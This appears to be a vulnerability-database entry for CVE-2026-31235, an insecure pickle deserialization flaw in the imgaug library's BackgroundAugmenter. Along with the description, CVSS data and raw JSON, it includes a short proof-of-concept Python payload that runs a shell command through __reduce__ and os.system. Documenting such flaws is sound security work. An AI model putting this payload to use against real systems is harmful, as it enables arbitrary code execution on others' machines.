CVE-2026-31235

Description

The imgaug library thru 0.4.0 contains an insecure deserialization vulnerability in its BackgroundAugmenter class within the multicore.py module. The class uses Python's pickle module to deserialize data received via a multiprocessing queue in the _augment_images_worker() method without any safety checks. An attacker who can influence the data placed into this queue (e.g., through social engineering, malicious input scripts, or a compromised shared queue) can provide a malicious pickle payload. When deserialized, this payload can execute arbitrary code in the context of the worker process, leading to remote or local code execution depending on the deployment scenario.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

imgaug <= 0.4.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import pickle
import os

# Define a malicious class that executes code on deserialization
class MaliciousPayload:
    def __reduce__(self):
        # Command to execute: creating a file as proof of concept
        # Change 'touch /tmp/pwned' to 'calc.exe' for Windows proof
        return (os.system, ('touch /tmp/pwned',))

# Serialize the payload
malicious_data = pickle.dumps(MaliciousPayload())

# In a real attack scenario, this 'malicious_data' would be placed
# into the multiprocessing queue consumed by imgaug.BackgroundAugmenter.
# When the worker process calls pickle.loads() on the queue item,
# the command 'touch /tmp/pwned' will be executed.

print("[+] Malicious pickle payload generated.")
print(f"[+] Payload length: {len(malicious_data)} bytes")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31235
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31235
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31235/
[4] VulDB https://vuldb.com/cve/CVE-2026-31235
[5] https://github.com/aleju/imgaug
[6] https://www.notion.so/CVE-2026-31235-35d1e139318881efb701d814228424a9

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31235", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:16:51.860", "lastModified": "2026-05-14T20:17:02.937", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The imgaug library thru 0.4.0 contains an insecure deserialization vulnerability in its BackgroundAugmenter class within the multicore.py module. The class uses Python's pickle module to deserialize data received via a multiprocessing queue in the _augment_images_worker() method without any safety checks. An attacker who can influence the data placed into this queue (e.g., through social engineering, malicious input scripts, or a compromised shared queue) can provide a malicious pickle payload. When deserialized, this payload can execute arbitrary code in the context of the worker process, leading to remote or local code execution depending on the deployment scenario."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://github.com/aleju/imgaug", "source": "[email protected]"}, {"url": "https://www.notion.so/CVE-2026-31235-35d1e139318881efb701d814228424a9", "source": "[email protected]"}]}}